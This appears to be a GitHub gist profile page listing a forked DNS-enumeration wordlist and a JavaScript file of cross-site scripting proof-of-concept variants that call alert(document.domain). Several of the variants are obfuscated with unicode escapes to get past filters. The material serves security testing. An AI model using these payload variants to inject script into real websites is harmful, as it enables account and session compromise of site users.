Skip to content

Instantly share code, notes, and snippets.

View mass0ma's full-sized avatar
🏠
Working from home

mass0ma

🏠
Working from home
View GitHub Profile
@mass0ma
mass0ma / all.txt
Created June 6, 2021 08:19 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@mass0ma
mass0ma / alert.js
Created August 23, 2021 14:39 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);